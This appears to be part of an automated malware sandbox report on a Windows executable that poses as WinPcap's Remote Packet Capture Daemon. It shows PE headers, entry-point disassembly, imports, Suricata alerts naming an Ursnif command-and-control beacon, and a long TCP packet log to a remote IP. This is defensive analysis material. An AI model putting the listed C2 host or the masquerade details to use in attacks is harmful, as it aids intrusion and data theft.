DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Instruction |
---|
jmp 00007F89EC4AA38Dh |
jmp 00007F89EC4DAAF8h |
jmp 00007F89EC4AA073h |
jmp 00007F89EC4A9D2Eh |
jmp 00007F89EC4AA149h |
jmp 00007F89EC4A9B84h |
jmp 00007F89EC4DFF6Fh |
jmp 00007F89EC4A9C8Ah |
jmp 00007F89EC4D32E5h |
jmp 00007F89EC4E31A0h |
jmp 00007F89EC4DEE0Bh |
jmp 00007F89EC4E4366h |
jmp 00007F89EC4A9C01h |
jmp 00007F89EC4D441Ch |
jmp 00007F89EC4E6A37h |
jmp 00007F89EC4DDCE2h |
jmp 00007F89EC4D549Dh |
jmp 00007F89EC4AA0B8h |
jmp 00007F89EC4E99D3h |
jmp 00007F89EC4A9DDEh |
jmp 00007F89EC4E5599h |
jmp 00007F89EC4DBBC4h |
jmp 00007F89EC4D64AFh |
jmp 00007F89EC4E53BAh |
jmp 00007F89EC4AA055h |
jmp 00007F89EC4E0F90h |
jmp 00007F89EC4D89EBh |
jmp 00007F89EC4E8AF6h |
jmp 00007F89EC4D78B1h |
jmp 00007F89EC4AA04Ch |
jmp 00007F89EC4A9BC7h |
jmp 00007F89EC4E20D2h |
jmp 00007F89EC4E7A4Dh |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/23/22-08:12:19.910177 04/23/22-08:12:19.910177 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
04/23/22-08:12:21.823792 04/23/22-08:12:21.823792 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
04/23/22-08:11:59.593120 04/23/22-08:11:59.593120 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.42.16 |
04/23/22-08:12:20.776897 04/23/22-08:12:20.776897 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 23, 2022 08:12:19.885525942 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.909297943 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:19.909377098 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.910176992 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.933670998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288152933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288214922 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288245916 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288285017 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288319111 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288326025 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288357973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288367033 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288398027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288400888 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288439989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288469076 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288495064 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288507938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288549900 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288579941 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288608074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288620949 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288661957 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288741112 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328840971 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328908920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328913927 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328938007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328944921 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328954935 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328972101 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328991890 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328993082 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329011917 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329025984 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329035044 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329041004 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329042912 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329065084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329070091 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329091072 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329108000 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329138994 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329176903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329232931 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329248905 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329309940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329349995 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329365969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329461098 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329534054 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329545975 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329549074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369694948 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369724989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369743109 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369766951 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369785070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369803905 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369812965 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369837999 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369841099 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369853973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369879007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369882107 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369931936 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.370174885 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370202065 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370218039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370239973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370259047 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.370285988 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.393351078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.396121025 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410522938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410547972 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410562038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410579920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410598040 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410609007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410725117 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410767078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410773993 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410815001 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410842896 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410861969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410912037 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410948038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410972118 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410988092 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411020041 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411101103 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411129951 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411148071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411159039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411170959 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411206007 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411315918 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.412249088 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.419718981 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.419918060 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.451852083 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.451911926 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.451941013 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.451982021 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452014923 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452053070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452090025 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452094078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452142000 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452146053 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452148914 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452203989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452258110 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452260017 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452291012 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452332020 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452338934 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452389002 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452431917 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452440023 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452491045 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452534914 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452544928 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452563047 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452603102 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452610016 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452652931 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452697039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452699900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452744961 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452785969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452795029 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.452816963 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.452867031 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.476562977 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.478291035 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.492733955 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.492798090 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.492827892 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.492868900 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.492909908 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.492949963 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.492969036 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.492980003 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493019104 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.493021965 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493073940 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.493140936 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493189096 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493216991 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493252039 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.493256092 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493299007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493310928 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.493340969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493371010 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493392944 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.493411064 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.493460894 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.502005100 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.502226114 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.533426046 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533483028 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533514023 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533551931 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533582926 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533679962 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.533727884 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.533785105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533830881 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533859968 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533890009 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.533900023 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533941031 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533970118 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.533992052 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.534012079 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.534051895 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.534080029 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.534101009 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.534121990 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.534184933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.534219027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.534255028 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.534259081 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.534308910 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.557888985 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.562295914 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.574759960 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.574799061 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.574820042 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.574847937 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.574876070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.574903965 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.574923038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.574925900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.574980021 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.574986935 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.575087070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575123072 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575145006 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.575150967 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
